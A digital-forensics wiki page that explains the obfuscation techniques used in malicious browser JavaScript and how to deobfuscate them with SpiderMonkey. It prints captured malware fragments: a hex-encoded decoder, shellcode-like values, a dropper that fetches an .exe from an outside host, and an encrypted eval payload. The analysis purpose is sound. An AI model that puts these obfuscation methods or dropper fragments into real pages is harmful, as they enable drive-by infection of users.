Category:Digital-Forensics/Browser-based-Malware/JavaScript

From aldeid
Jump to navigation Jump to search
You are here:
JavaScript

Defensive techniques

Encoding

  • Code can be sometimes encoded to complexify the analyst's work
  • Various encoding techniques

Here is an example of a hex-encoded string:

%3c%53%43%52%49%50%54%20%4c%41%4e%47%55%41%47%45%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20%62%61%66%66%67%71%71%72%6a%28%72%72%72%29%7b%76%61%72%20%74%65%6d0%3d%22%22%3b%20%76%61%72%20%63%63%63%3d%30%3b%20%76%61%72%20%6f%75%74%3d%22%22%3b%76%61%72%20%73%74%72%3d%72%72%72%3b%6c%3d%73%74%72%2e%6c%65%6e%67%74%68%3b%77%68%69%6c%65%28%63%63%63%3c%3d%73%74%72%2e%6c%65%6e%67%74%68%2d%31%29%7b%77%68%69%6c%65%28%73%74%72%2e%63%68%61%72%41%74%28%63%63%63%29%21%3d%27%52%27%29%74%65%6d%70%3d%74%65%6d%70%2b%73%74%72%2e%63%68%61%72%41%74%28%63%63%63%2b%2b%29%3b%63%63%63%2b%2b%3b%6f%75%74%3d%6f%75%74%2b%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%70%61%72%73%65%49%6e%74%28%74%65%6d%70%2c%31%36%29%2d%36%39%29%3b%74%65%6d%70%3d%22%22%3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6f%75%74%29%3b%7d%3c%2f%53%43%52%49%50%54%3e

You could decode the string with python as follows:

$ python -c "print '%3c%53%43%52%49%50%54%20%4c%41%4e%47%55%41%47%45%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20%62%61%66%66%67%71%71%72%6a%28%72%72%72%29%7b%76%61%72%20%74%65%6d0%3d%22%22%3b%20%76%61%72%20%63%63%63%3d%30%3b%20%76%61%72%20%6f%75%74%3d%22%22%3b%76%61%72%20%73%74%72%3d%72%72%72%3b%6c%3d%73%74%72%2e%6c%65%6e%67%74%68%3b%77%68%69%6c%65%28%63%63%63%3c%3d%73%74%72%2e%6c%65%6e%67%74%68%2d%31%29%7b%77%68%69%6c%65%28%73%74%72%2e%63%68%61%72%41%74%28%63%63%63%29%21%3d%27%52%27%29%74%65%6d%70%3d%74%65%6d%70%2b%73%74%72%2e%63%68%61%72%41%74%28%63%63%63%2b%2b%29%3b%63%63%63%2b%2b%3b%6f%75%74%3d%6f%75%74%2b%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%70%61%72%73%65%49%6e%74%28%74%65%6d%70%2c%31%36%29%2d%36%39%29%3b%74%65%6d%70%3d%22%22%3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6f%75%74%29%3b%7d%3c%2f%53%43%52%49%50%54%3e'.replace('%','').decode('hex')"

Here is the output of the previous command:

<SCRIPT LANGUAGE="JavaScript">function baffgqqrj(rrr){var temp=""; var ccc=0; var out="";var str=rrr;l=str.length;while(ccc<=str.length-1){while(str.charAt(ccc)!='R')temp=temp+str.charAt(ccc++);ccc++;out=out+String.fromCharCode(parseInt(temp,16)-69);temp="";}document.write(out);}</SCRIPT>

Split the script into multiple script tags

  • On other technique is to split the JavaScript code into multiple script tags
  • Junk code in the middle of the script to even complexify the analysis

Use of array values

e1 = ('some', 'text', 1, 'docum');
e2 = (1, 'abc', 'ent');
r = e1 + e2;

As the result of the above code, variable r will contain the string "document".

One-line conditionals

a = 1;
b = 2;
abc = (a>b?'print':'escape');

The above command is the short version of this code:

a = 1;
b = 2;
if(a>b) {
   abc = 'print';
} else {
   abc = 'escape';
}

Array notation

a = "document";
b = "write";
c = "some text";
a[b](c);

The above code is the equivalent of:

document.write("some text");

Replace characters

a = "DdsoaJcuFmGGeznZtT";
b = a.replace(/[DsaJFGzZT]/g,'');

Referencing HTML elements

Another technique is to reference HTML elements in the JavaScript code:

[SNIP]
<input type="hidden" id="fjGHs" value="%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" />
[SNIP]
<script language="javascript">
XJK = document.getElementById('fjGHs').value;
[SNIP]
</script>

Some malicious JavaScript codes could also dynamically create HTML elements on the fly:

var XJK = document.createElement("script");
XJK.type = "text/javascript";
XJK.text = AVlWGTj;
document.body.appendChild(XJK);

Last-Modified aware scripts

  • Some JavaScript could be aware of the Last-Modified value.
  • You can use the lastModified parameter in the Def.js script
$ js -f /usr/local/etc/def.js -f modified.js
modified.js:1: TypeError: copvwx[4] is undefined

Modify the lastModified parameter as follows:

$ grep -B14 -A1 "lastModified" def.js 
document = {
    write:print,
    writeln:print,
    createElement: function(input_string) {
        print("/* document.CreateElement(" + input_string + ") */");
        return {}
    },
    body: {
        appendChild: function(input_string) {
            print(input_string.text);
        }
    },
// If necessary, set "referrer" to the proper value
// referrer:"http://www.google.com/search?hl=en&q=web&aq=f&oq=&aqi=g1",
// If necessary, set "lastModified" to the proper value
lastModified:"Fri, 12 Dec 2008 11:11:40 GMT"
};

This time, SpiderMonkey will be able to run:

$ js -f /usr/local/etc/def.js -f modified.js | head

//eval
function doxy(){}
var urltofile='http://redirectcounter1.com/fzjhpq1.exe';var filename='fzjhpq.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,)}catch(e){}}
if(!r){try{r=o.CreateObject(n,,)}catch(e){}}
if(!r){try{r=o.GetObject(,n)}catch(e){}}
if(!r){try{r=o.GetObject(n,)}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}

Location-aware scripts

Several ways to identify location:

  • location
  • document.location
  • window.location
  • location.href
  • document.location.href
  • window.location.href

You may need to adapt the def.js script depending on the requirements.

If you try to run a location-aware script, you may obtain gibberish:

$ js -f /usr/local/etc/def.js -f fgg.js

//warning CVE-NO-MATCH Shellcode Engine Binary Threshold

//eval
                         e3Ng.W B�[ff\Tcmlnl��<@18Wp8e1T�@ V&"XZC{0j��!dE849#$jV6yaw�P9Z/oo]#8!,�T6:GXIg+h.wU]mP^h(4LD0V'#"'�(d'f7ltH L8#c=[!m^S6K3d\V_khrHQ`f�$>vfb
dPofh-U�!jx�QW'cE?2xN.+j!R\wcm�R*vk1n1%9%CK B��<louy%kVg#k1n1%9%CK)%kdj]_rw3\\dPolos�*!�*%;�mai��~Ug9U4@TDR%-%-y[X#=%S.4&pFvy]�dW\uCtTRBc#RF9'!eUso)@mcba�TR<f1Q&pQ B�#*qdr%EOJW.TYFB
HCPdEi46n��:S4ia<2&c�4HB6Q&7&4<B5(&: \5A>'#B00386&!8#2755#3:S4Ia<2&c�4hb6Q&7&4g9G)#b(\<9=(�:10386&!8#2755#S:34Ia<R&c�4hB6Q&7&4I7H)!8#379:(2b'0386&!8#2755#S5%.DAIQN7"1469)&B'46b>2�B'<:b<& B(37A;)"B5\gbh)27!03BK%�5S/94i1/:0\569)RbT<68:)&bT24B:'S6�/6b>)#bQ03A=)�8(2E8<(2904G69(�7"\:A9QOb!4:a:R%c!<E76)#B(\396QQC <;b:(O:4<5B<QQc!\:7J$�5"<9A:R#7"=37<1%c�3<8H2�b'0<85%"7%1456$Rc(4Db:%"b'2g7:QP:�<E8:1/6(1G69&#8"1d6:'�5%.D56$RcP\4AH1�:40;6H2/8&\fBF(29 4HA>&!9�0<A<(�75258=)1:#<976)2B&47A>20:!4I6g%$8#3699&#750<BF&&bR<:9I(0c 4H6j&#7!0<69&"9�0<75&#7!03BK%�5S/5b>)#bQ03A;RR: 3f9G)19!<469(�7"4G8K&O8Q279I)"c�1:A;)Q:P\58:2%71]37<Q%C�3<8h2�B'177;%R8#.G4j%�5S/5AH)O6(0;a;RR: 3F9g)19!<469(�9�0<6:&#6Q0<56$252/5b7(�704;962#9$<I68'�6(0579'#7$2755#35!48B5R$b'0<AH)O6(0;a;22: 3f9g)19!\469(�9�0<6:&$610<56$R52/5b7(�7P4;96R#9$\i68'�6(0579'$7$2755#35!48b52$B'0<AH)O6(0;A;22: 3F9G)Q9!\469(�9�0<6:&%610<56$25R/5b7(�704;96R#9$\i68'�6(0579'%7$2755#35!48b5R$B'0<AH)O6(0;A;22: 3f9G)19!\469(�9�0<6:&&610<56$R5R/5B7(�704;96R#9$\i68'�6(0579'&7$2755#S5!48B5R$B'0<ah)O6(0;a;RR: 3F9g)19!<469(�9�0<6:&N610<56$R5R/5b7(�7P4;96R#9$\i68'�6(0579'.7$2755#35!48B52$B'0<ah)O6(0;A;22: 3F9G)Q9!\469(�9�0<6:&/610<56$R5R/5B7(�7P4;96R#9$<I68'�6(0579'O7$2755#S5%.d4i11b(0<6gQ!9%14ah)�c$2Eb>%"6P1G69&#8"1D6:%R5%.D4i$Qb$\ea=)#b#1e56$2D�/94I$�5"4<af&!7Q\;95&#B 2gb;(#C(0<85'�6(0579'"7$0<6>%/6(4795'N9$2G9H(#b%0HAIR�B&4hBG(!:U0;6;)#b'<8a=)#B24869($B#\:a<)R:S44b=Q&7$1868&"7!036:(�7"1979%R5%.d4I2 :�1DAG(�bQ25bf&!9�0<6:&"8 057k%�5S/94i$�5"\9a:2#7"<I89'NB$2;9<2�:&0<85%"B&44BF11bP4dB<1!B10HB<21c%<GA=1�9$44b71/c'4DAF).7&<6b>1#C%\gB:%17(0f69'"8"157j$�5"\9A:R#7"\<9F1!9#<;9j)0bP0<85%"6Q057K%�53/94I$�5"49b82#7Q\iA9Q$6(2<8f(":"2F9F'$c 1G79'S9R2i89("823:8;RP85\i89'NB$2;9<2�:&1:AK)Nb&4:b=QP8T358>'#9(269g(#cQ176J%26(\e56$25R=5B6)38S447g($:�0<85%"bU248>R�9Q3Fb5(&7&46AH1"c$2fb7)&:424B=&0922i89("8R3:8;20721:B<1!9R<7b;QQc \36G&#750<7k%�5S/94I#2B!4969&0cR\:ai'&:01:8<)�7"2868&$7!.g4j$Q5R<<9f1!9#\;9j)PB00<6J'�6(0579&#8T/94i$�5".<b9)OC!37bg(3: 4:69&39�0<bh1 b"27A:'/9%397j$�5"\g56$R6�/6bf)1B!4fA>&PC"43B7(�C 3D9h1/8 <8A=Q b�\7ah&!850<7:&"7!.g4J$QC"43B7(�C 3d9HQO7"1785%"6Q1379&#84/94I$�5".G4j2.B#\e68(Sb#4D8;Q%c'2DB9%"8%03b8)�8#\4951$8Q<969&S7"<<9F1!9#<;9j)0bP2755#SB544b;&!:!<7B7)38S359:1$7"2968)&b'46B>R�b'<:B<& :R\5A>Q"c&4H8=Q�:T4GA>R�C&146:1%:2<5aiR!c&0E6h'�5%.D98QSc!\68<($9P4677R$B'\g891&bS\5AI1#c'<Ga=%Q6Q\7bi2!b'0e6K%"6Q\7A>RPc&1;AI)#B544b<1$C$<5b81&610<7k%�533;AJ1!B"279;)"b%1:B;)NbS24B=R%c$\5a:1.B3486h&#C%<Ea;%$7$036;QPC&<GB8&S7'0iBGROcP1:af)RB3<3b82#bP1:A;1!b%0Ia<QObR19a:)2b&0iAI2�b&4Hbg& :24:AI( b(23A>&$8!16A<'18"1d78&":U137F'!8"1<7<)#8�147f'O8#4e78&/7(1379'!8"1<78&"7(19a;1.8Q4HA;)O:044af1.7$0<6j%":"4eAJ(#b&<H891#7!1e56$Rb&<;A;QNB%48b72%8 4EB7)&C!0Ha:R!c"4hB6)&8R4;aiR�b&14971�B'4D8=)#:#4F6H'�5%.Dc6%�5S",;

Modify the def.js script as follows:

location = {
    // If necessary, set "href" to the proper value
    href:"http://www.gitporg.com/cgi-bin/index.cgi?fgg"
}

This time, the script will run properly:

$ js -f /usr/local/etc/def.js -f fgg.js 
 
 //eval
 function CSccVn16i(TXDBPOu3S, RbjJbR3tj){var Q65WkHx0e = arguments.callee;var uJ54437ig = location.href;Q65WkHx0e = Q65WkHx0e.toString();Q65WkHx0e = Q65WkHx0e + uJ54437ig;var c8k4loX3K = Q65WkHx0e.replace(/\W/g, "");c8k4loX3K = c8k4loX3K.toUpperCase();var Q5FFF71QH = 4294967296;var X1FuFMx3T = new Array;for(var OF474dfxl = 0; OF474dfxl < 256; OF474dfxl++) {X1FuFMx3T[OF474dfxl] = 0;}var YR7YAkev4 = 1;for(var OF474dfxl = 128; OF474dfxl; OF474dfxl >>= 1) {YR7YAkev4 = YR7YAkev4 >>> 1 ^ (YR7YAkev4 & 1 ? 3988292384 : 0);for(var nlRMk6MGU = 0; nlRMk6MGU < 256; nlRMk6MGU += OF474dfxl * 2) {var viT06b60O = OF474dfxl + nlRMk6MGU;X1FuFMx3T[viT06b60O] = X1FuFMx3T[nlRMk6MGU] ^ YR7YAkev4;if (X1FuFMx3T[viT06b60O] < 0) {X1FuFMx3T[viT06b60O] += Q5FFF71QH;}}}var cA37uCvtm = Q5FFF71QH - 1;for(var acv4dJv58 = 0; acv4dJv58 < c8k4loX3K.length; acv4dJv58++) {var GQTi5C5m4 = (cA37uCvtm ^ c8k4loX3K.charCodeAt(acv4dJv58)) & 255;cA37uCvtm = (cA37uCvtm >>> 8) ^ X1FuFMx3T[GQTi5C5m4];}cA37uCvtm = cA37uCvtm ^ (Q5FFF71QH - 1);if (cA37uCvtm < 0) {cA37uCvtm += Q5FFF71QH;}cA37uCvtm = cA37uCvtm.toString(16).toUpperCase();while(cA37uCvtm.length < 8) {cA37uCvtm = "0" + cA37uCvtm;}var lsVfmDb04 = new Array;for(var OF474dfxl = 0; OF474dfxl < 8; OF474dfxl++) {lsVfmDb04[OF474dfxl] = cA37uCvtm.charCodeAt(OF474dfxl);}var QR7vDP7uN = "";var UbIh3QYAR = 0;for(var OF474dfxl = 0; OF474dfxl < TXDBPOu3S.length; OF474dfxl += 2){var viT06b60O = TXDBPOu3S.substr(OF474dfxl, 2);var b6MOO6vq1 = parseInt(viT06b60O, 16);var T76fARLr8 = b6MOO6vq1 - lsVfmDb04[UbIh3QYAR];if(T76fARLr8 < 0) {T76fARLr8 = T76fARLr8 + 256;}QR7vDP7uN += String.fromCharCode(T76fARLr8);if(UbIh3QYAR + 1 == lsVfmDb04.length) {UbIh3QYAR = 0;} else {UbIh3QYAR++;}}var h1iA886HH = 0;try {eval(QR7vDP7uN);} catch(e) {h1iA886HH = 1;}try {if (h1iA886HH) {window.location = "/";}} catch(e) {}}
CSccVn16i('9d9fa7B9b09EB1a96799B08991a2A976AA5081647474503F9d9Fa7B9b09eb1a9679d9B96a9a998819B5081647474503f9D9Fa7b9b09eB1a9679F7C947484958Ea85081647474503f463AADaa63616499A893b9B1A8A7b763A984A695AFadbc9E6250BF514d464dAB9Aa2649eaeA38599ae71B57f5043b996ab50A890797B878E8A9D648163a7A4aba297a5b8b2AB7196A9a091adB1A8b58b9EA2B7adb2a77E4243A6A5b663B077A8b0898CB2a85980556661514eb99Ab555a87d75ac90AB85AB596D6466736a6570463A514ebaa1ACA19E586CBB77acBA8E819EA9648059A7816F72889D94A6719EA794A9BC929F6b57748394666F59BA69acA79D8Cb19E6e6662596465805970666250BF514d42b996ab50A6be918c9B9D82A16481639D8F6b7b749D95b067A69d9aa285B86Bb077a8B0898cB2A864765e743D4e514d42AC9b5958a6be918C9b9D82A16481805965665b59514E4C42b2826A9891B685AF6372595274766574503F4295B0b7a859AC9b5958a6BE918c9b9D82a16481805965675B59514e4C42b2826a9891b685af6372595274776574503F4295b0B7A859AC9b5958A6BE918C9B9d82a16481805965685B59514E4c42b2826A9891b685af6372595274786574503F4295b0b7A859AC9b5958A6BE918c9B9D82a16481805965695B59514e4c42B2826A9891b685af6372595274796574503f4295B0b7A859ac9b5958a6be918C9b9D82A164818059656a5B59514e4c42b2826a9891b685af63725952747A6574503F4295B0B7A859ac9b5958A6BE918C9B9d82a164818059656B5B59514e4c42B2826a9891b685AF63725952747b6574503f463a4dADa9596ba48661ac91b57Bb9555a6D6466736A655e463A4d4da5aba896a46b514EC0464D424399aa646ba89066A17db686B9598072595274756559695B5994907a857D9C86a65EADb2A79eBB849f586696a8A5a896AC956487A4a7a79e9d91b8a965656365625065816366745e463a4DB3906AAB82ab72ba648059656571527f514d464d4243a6a5B663AF847aA57897B197598055A791BAADaa9aB7A4AB5EB7BDb6ADA8A28591b2ABb89AAA9A67A3b9A6B6adB55D695c647573627e4243a6A5b663a99AA484A89e9Caa5980555b527F514D464D424396b3B66bafA4a759798a85937C9A77b16D747f8c7f84857C8786bc7Faf847aA57897B19767AF9aa797b8ac7e82897689739b86bb646E5E59ab514E4cB2B19F7d917b8790598055af7189b08b8Cb0896793ACA5b57cb2999E71B86C8C7f84857c8786BC6C67B7A48cA4b6adb1a06B666F597f514d464D3EA296646Cbca7ad799A67879163756367623d4e4d4cA99aA484a89e9cAA596E72595274667e464d424339b49bB284bb8F9197646F8059bcA3a374A57B86867e4243ad514e5043ba9DA29cA96cB390B280B18A9cAB71A5A8a3a0a4ac647F597565623d4E4dB390B280B18a9Cab636480555b6074667E464D42433D4eBAA4ab638fa49A86a8b87AB4557650b39174a190A77bA6646f63A99AA484A89e9Caa74503fAF91b66492A4B29F7d8295A763766399a893B9b1a8A7B7639ca2A9a5b79E88a19e9DA9b2B76165A89CA2adb4b75B6c70463A93afb2a387878a9372b7A8ad84A9ada2ADA6b8ADa85d5ba4bdB4a85b6F555ba4A9bcb768AD96AF91b7A7B5A2b3A95B597f514D88AEA4A3749695a667B69aad71B8b8b5a2a5AAAD956c66B6ABa657655066acB7ADB36f685fBBbbba67aa9eADA0b3B6aa67A6A4a65Fa7abac66a59Ea75fADB2a79Ebb639C97AD83a970A9677263A77D736a73659f607A747369779670617a7b749b736B69607474736973656966a6AA7b9EA69b9A91aaAA65596e55939bAE86a7AE84A6626b514ea7A8A6aaA695b2B8719BB299B25Ea5b4b39eB1997c98adb0a76192A0A89A8896949C6C70463Ac1514d');

//eval
document.ilENifAq = 1;
document.mWRfpULb = 1;
document.o8P1KRYo = 1;
[SNIP]

Test function integrity

JavaScript offers the possibility to test whether a function has been modified with arguments.callee. Here is an example:

<html>
<head>
    <title>test</title>
    <script type="text/javascript">
    function test() {
        if (arguments.callee.toString().length!=118) {
            alert('This function has been modified');
        }
    }
    </script>
</head>
<body>
    <input type="button" value="test" onclick="test();" />
</body>
</html>

Online resources

Comments

Pages in this category

Pages in category "Digital-Forensics/Browser-based-Malware/JavaScript"

The following 13 pages are in this category, out of 13 total.